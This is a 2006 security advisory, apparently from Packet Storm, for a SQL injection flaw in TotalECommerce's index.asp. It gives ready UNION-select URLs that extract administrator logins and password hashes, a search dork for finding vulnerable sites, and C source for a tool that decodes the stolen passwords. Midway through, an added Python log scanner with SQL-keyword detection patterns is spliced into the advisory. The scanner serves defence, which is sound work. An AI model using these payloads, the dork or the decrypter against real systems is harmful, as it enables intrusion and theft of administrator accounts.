TotalECommerceSQL.txt

2006-03-08T00:00:00
ID PACKETSTORM:44417
Type packetstorm
Reporter Mustafa Can Bjorn
Modified 2006-03-08T00:00:00

Description

                                        
--Security Report--  
Advisory: TotalECommerce (index.asp id) Remote SQL Injection Vulnerability.  
---  
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI  
---  
Date: 04/03/06 04:36 AM  
---  
Contacts:{  
ICQ: 10072  
MSN/Email: nukedx@nukedx.com  
Web: http://www.nukedx.com  
}  
---  
Vendor: TotalECommerce (http://www.totalecommerce.com)  
Version: 1.0 and prior versions must be affected.  
About: Via this method a remote attacker can inject arbitrary SQL queries into the id parameter of index.asp.  
Level: Critical  
---  
How&Example:  
GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL]  
EXAMPLE 1 ->  
http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,  
senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,  
senha,senha,senha,senha,senha,senha,senha+from+administradores  
EXAMPLE 2 ->  
http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,  
login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,  
login,login,login,login,login,login,login+from+administradores  
With example 1 a remote attacker can get the admin's encrypted password, and with  
example 2 a remote attacker can get the admin's login name.  
[PageID]: must be a working page id; you can get some from the front page.  
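
Added example, not part of the original advisory: a log check for the request pattern described above, flagging any index.asp request whose secao or id value is not a plain integer. The log lines, the /loja/ path and the IP addresses are constructed, and the digits-only rule is an assumption about what a legitimate id looks like.

```python
import re
from urllib.parse import parse_qs

# Constructed sample in IIS W3C field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2006-03-08 10:01:12 192.0.2.10 GET /loja/index.asp secao=25&id=14 200
2006-03-08 10:01:40 192.0.2.77 GET /loja/index.asp secao=25&id=-1+UNION+select+senha,senha+from+administradores 200
2006-03-08 10:02:03 192.0.2.10 GET /loja/produto.asp id=abc 200
2006-03-08 10:02:30 192.0.2.77 GET /loja/index.asp secao=25&id=-1%20UnIoN%20SeLeCt%20login%20from%20administradores 500
"""

NUMERIC = re.compile(r"[0-9]{1,9}")  # assumed shape of a legitimate id/secao
SQL_WORDS = re.compile(r"\b(union|select|from|administradores)\b", re.I)


def is_valid_id(value):
    """True only for a short, digits-only value."""
    return NUMERIC.fullmatch(value) is not None


def scan(log_text, page="index.asp", params=("secao", "id")):
    """Return one finding per non-numeric secao/id value sent to the page."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue  # W3C header line or malformed entry
        ip, stem, query = fields[2], fields[4], fields[5]
        if not stem.lower().endswith("/" + page):
            continue
        # parse_qs decodes %xx and '+', so encoded payloads are normalised
        for name, values in parse_qs(query, keep_blank_values=True).items():
            if name.lower() not in params:
                continue
            for value in values:
                if not is_valid_id(value):
                    findings.append({"ip": ip, "param": name, "value": value,
                                     "sql_words": bool(SQL_WORDS.search(value))})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

The same digits-only check, applied server-side before the value reaches the query (together with a parameterized query), is the corresponding fix for the id parameter.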
---  
Timeline:  
* 04/03/2006: Vulnerability found.  
* 04/03/2006: Could not contact vendor.  
* 04/03/2006: File closed.  
---  
Exploit&Decrypter:  
http://www.nukedx.com/?getxpl=18  
---  
Dorks: intext:"totalecommerce"  
---  
Original advisory: http://www.nukedx.com/?getxpl=18  
  
---  
Decrypter source in C  
---  
/*********************************************  
* TotalECommerce PWD Decrypter *  
* Coded by |SaMaN| for nukedx *  
* http://www.k9world.org *  
* IRC.K9World.Org *  
*Advisory: http://www.nukedx.com/?viewdoc=18 *  
**********************************************/  
#include <ctype.h>   /* toascii() */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
    char buf[255];        /* encrypted password as read from input */
    char buf2[255] = "";  /* decoded result, one character per input byte */
    size_t i;
    int t, z;

    printf("%s", "|=------------------------------------=|\n");
    printf("%s", " Coded by |SaMaN| @ IRC.K9World.Org\n");
    printf("%s", "|=------------------------------------=|\n\n");
    printf("%s", "Enter crypted password: ");
    /* at most 200 characters are read, so both buffers are large enough */
    if (scanf("%200s", buf) != 1)
        return 1;

    for (i = 0; i < strlen(buf); i++)
    {
        t = buf[i];
        z = 255 - t;                  /* each stored byte is 255 minus the original */
        buf2[i] = (char)toascii(z);   /* keep the low 7 bits */
    }
    buf2[i] = '\0';
    printf("Result: %s\n", buf2);
    return 0;
}
---End of code---  
Greets to: |SaMaN|  
  